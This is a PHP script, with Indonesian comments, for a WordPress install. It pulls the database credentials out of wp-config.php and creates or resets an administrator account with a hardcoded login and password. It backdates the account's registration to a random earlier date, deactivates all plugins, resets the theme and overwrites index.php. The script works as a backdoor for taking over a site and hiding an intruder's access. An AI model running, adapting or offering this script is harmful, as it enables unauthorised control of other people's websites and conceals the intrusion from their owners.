<?php
$new_user_login = 'audywebmuchy@112';
$new_user_pass  = 'audywebmuchy@112';
$new_user_email = 'admin@example.com';

$wp_config_path = __DIR__ . '/wp-config.php';
$wp_index_path  = __DIR__ . '/index.php';

// === Fungsi parsing wp-config.php ===
function parse_wp_config_constants($file_path, $constants = ['DB_NAME','DB_USER','DB_PASSWORD','DB_HOST']) {
    $values = [];
    $content = file_get_contents($file_path);
    foreach ($constants as $const) {
        if (preg_match("/define\s*\(\s*['\"]" . preg_quote($const, '/') . "['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $content, $matches)) {
            $values[$const] = $matches[1];
        } else {
            $values[$const] = null;
        }
    }
    return $values;
}

function parse_table_prefix($file_path) {
    $content = file_get_contents($file_path);
    if (preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]\s*;/", $content, $matches)) {
        return $matches[1];
    }
    return 'wp_';
}

// === Deteksi tema default terbaru ===
function detect_default_theme() {
    $themes_dir = __DIR__ . '/wp-content/themes';
    $default_theme = 'twentytwentyfour'; // fallback

    if (is_dir($themes_dir)) {
        $themes = scandir($themes_dir);
        $candidates = [];
        foreach ($themes as $theme) {
            if (preg_match('/^twenty(\d{2,4})$/', $theme, $matches)) {
                $candidates[$matches[1]] = $theme;
            }
        }
        if (!empty($candidates)) {
            krsort($candidates); // ambil tahun terbaru
            $default_theme = reset($candidates);
        }
    }
    return $default_theme;
}

// === Ganti index.php dengan bawaan WordPress ===
function restore_wordpress_index($index_path) {
    $default_content = <<<PHP
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

PHP;

    if (file_exists($index_path)) {
        unlink($index_path);
        echo "Existing index.php deleted.\n";
    }
    file_put_contents($index_path, $default_content);
    echo "index.php restored to WordPress default.\n";
}

// === WordPress Compatible Password Hash ===
function wp_hash_password_compatible($password) {
    // Untuk WordPress 5.5+ (bcrypt)
    if (function_exists('password_hash')) {
        return password_hash($password, PASSWORD_BCRYPT);
    }

    // Fallback ke metode lama ($P$) untuk WP < 5.5
    $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
    $iteration_count_log2 = 8;
    $random = substr(str_shuffle($itoa64), 0, 6);

    $setting = '$P$' . $itoa64[min($iteration_count_log2 + 5, 30)] . $random;
    $count_log2 = strpos($itoa64, $setting[3]);
    $count = 1 << $count_log2;
    $salt  = substr($setting, 4, 8);

    $hash = md5($salt . $password, true);
    do {
        $hash = md5($hash . $password, true);
    } while (--$count);

    return $setting . encode64_legacy($hash, 16, $itoa64);
}

function encode64_legacy($input, $count, $itoa64) {
    $output = '';
    $i = 0;
    do {
        $value = ord($input[$i++]);
        $output .= $itoa64[$value & 0x3f];
        if ($i < $count) {
            $value |= ord($input[$i]) << 8;
            $output .= $itoa64[($value >> 6) & 0x3f];
        } else {
            $output .= $itoa64[($value >> 6) & 0x3f];
            break;
        }
        if ($i++ >= $count) break;
        if ($i < $count) {
            $value |= ord($input[$i]) << 16;
            $output .= $itoa64[($value >> 12) & 0x3f];
            $output .= $itoa64[($value >> 18) & 0x3f];
        } else {
            $output .= $itoa64[($value >> 12) & 0x3f];
            break;
        }
    } while ($i < $count);

    return $output;
}

if (!file_exists($wp_config_path)) {
    die("Error: wp-config.php not found.\n");
}

$db_constants = parse_wp_config_constants($wp_config_path);
$table_prefix = parse_table_prefix($wp_config_path);

if (in_array(null, $db_constants, true)) {
    die("Error: Could not find all database credentials in wp-config.php\n");
}

$db_name     = $db_constants['DB_NAME'];
$db_user     = $db_constants['DB_USER'];
$db_password = $db_constants['DB_PASSWORD'];
$db_host     = $db_constants['DB_HOST'];

// === Koneksi ke database ===
$mysqli = new mysqli($db_host, $db_user, $db_password, $db_name);
if ($mysqli->connect_error) {
    die("Connection failed: " . $mysqli->connect_error);
}

// Generate hash password kompatibel semua versi WP
$password_hash = wp_hash_password_compatible($new_user_pass);

// Cek apakah username sudah ada
$stmt = $mysqli->prepare("SELECT ID FROM `{$table_prefix}users` WHERE user_login = ?");
$stmt->bind_param('s', $new_user_login);
$stmt->execute();
$stmt->bind_result($existing_user_id);
$user_exists = $stmt->fetch();
$stmt->close();

if ($user_exists) {
    // Update password & email jika user sudah ada
    $stmt = $mysqli->prepare("UPDATE `{$table_prefix}users` SET user_pass = ?, user_email = ? WHERE ID = ?");
    $stmt->bind_param('ssi', $password_hash, $new_user_email, $existing_user_id);
    if (!$stmt->execute()) {
        die("Error updating user: " . $stmt->error . "\n");
    }
    $stmt->close();
    echo "Success! Existing user '{$new_user_login}' updated.\n";
} else {
    // Insert user baru
    $time = date('Y-m-d H:i:s', rand(strtotime('2020-01-01'), strtotime('2023-12-31')));
    $stmt = $mysqli->prepare("
    INSERT INTO `{$table_prefix}users` 
    (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_activation_key, user_status, display_name) 
    VALUES (?, ?, ?, ?, '', ?, '', 0, ?)
    ");

    $user_nicename = strtolower($new_user_login);
    $display_name  = $new_user_login;
    $stmt->bind_param('ssssss', $new_user_login, $password_hash, $user_nicename, $new_user_email, $time, $display_name);
    if (!$stmt->execute()) {
        die("Error inserting user: " . $stmt->error . "\n");
    }
    $new_user_id = $stmt->insert_id;
    $stmt->close();

    // Tambahkan capabilities dan level
    $cap_key = $table_prefix . 'capabilities';
    $level_key = $table_prefix . 'user_level';
    $capabilities = serialize(['administrator' => true]);

    $stmt = $mysqli->prepare("INSERT INTO `{$table_prefix}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
    $stmt->bind_param('iss', $new_user_id, $cap_key, $capabilities);
    $stmt->execute();
    $stmt->close();

    $user_level = 10;
    $level_value = (string)$user_level;
    $stmt = $mysqli->prepare("INSERT INTO `{$table_prefix}usermeta` (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
    $stmt->bind_param('iss', $new_user_id, $level_key, $level_value);
    $stmt->execute();
    $stmt->close();

    echo "Success! WordPress admin user '{$new_user_login}' created.\n";
}

// === Nonaktifkan semua plugin ===
$empty_plugins = serialize([]);
$stmt = $mysqli->prepare("UPDATE `{$table_prefix}options` SET option_value = ? WHERE option_name = 'active_plugins'");
$stmt->bind_param('s', $empty_plugins);
$stmt->execute();
$stmt->close();
echo "All plugins have been deactivated.\n";

// === Set tema ke default terbaru ===
$default_theme = detect_default_theme();
$stmt = $mysqli->prepare("UPDATE `{$table_prefix}options` SET option_value = ? WHERE option_name IN ('template','stylesheet')");
$stmt->bind_param('s', $default_theme);
$stmt->execute();
$stmt->close();
echo "Theme set to {$default_theme}.\n";

// === Restore index.php ===
restore_wordpress_index($wp_index_path);

$mysqli->close();
?>
